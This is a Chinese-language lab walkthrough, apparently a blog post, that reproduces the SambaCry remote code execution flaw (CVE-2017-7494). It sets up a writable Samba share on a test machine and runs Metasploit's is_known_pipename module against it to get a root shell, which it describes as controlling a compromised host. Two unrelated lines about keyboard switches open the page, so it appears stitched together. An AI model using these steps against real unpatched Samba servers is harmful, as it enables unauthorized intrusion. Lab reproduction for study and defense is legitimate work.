8种机械键盘轴体对比
本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?
漏洞概述
2017年5月24号,Samba官方发布4.6.4版本,声明修复了一个严重漏洞(CVE-2017-7494),可以造成远程代码执行,运行Samba服务的Linux/Unix设备,可能会被直接getshell。
Samba是在Linux或Unix系统上用来实现文件共享和打印服务的通信协议,也是很多家用的智能硬件设备例如NAS设备内置的协议,采用服务端口445。由于Samba内置函数is_known_pipename里面出现字符过滤问题,导致攻击者可以向共享目录传递恶意文件,导致被远程代码执行。
影响版本
Samba 3.5.0 ~ 4.5.10中间的所有版本。
漏洞复现环境
Kali Linux 2018 –> Kali Linux 2017
渗透机:Kali Linux 2018(ip:192.168.31.85)
靶机:Kali Linux 2017(ip:192.168.31.184)
Kali Linux 2017,查看Samba版本1samba --version Version 4.5.8-Debian
Kali Linux 2017里面创建Samba共享目录1
2mkdir /tmp/public //创建共享目录
chmod 777 /tmp/public //修改读写执行权限
这是SambaCry漏洞利用的前提,必须有一个共享目录,这样攻击者就可以在这个共享目录传递攻击代码并执行,获取到Root权限并控制肉鸡。
Kali Linux 2017 修改Samba配置文件1
2
3
4
5
6
7
8
9vim /etc/samba/smb.conf
[public]
comment = public
browseable = yes
writeable = yes
path = /tmp/public
public = yes
read only = no
Kali Linux 2017 重启/启动Samba服务1
2/etc/init.d/samba restart //重启samba服务
netstat -tnlp samba //查看samba端口状态
开始攻击
Kali Linux 2018 进入msf框架,使用SambaCry渗透模块1
2
3msfconsole //进入msf
use exploit/linux/samba/is_known_pipename //使用渗透模块is_known_pipename
info //查看模块信息
1show options //查看模块选项
1
2set RHOST 192.168.31.184 //设置靶机地址
exploit //开始攻击
成功拿到shell。
参考文章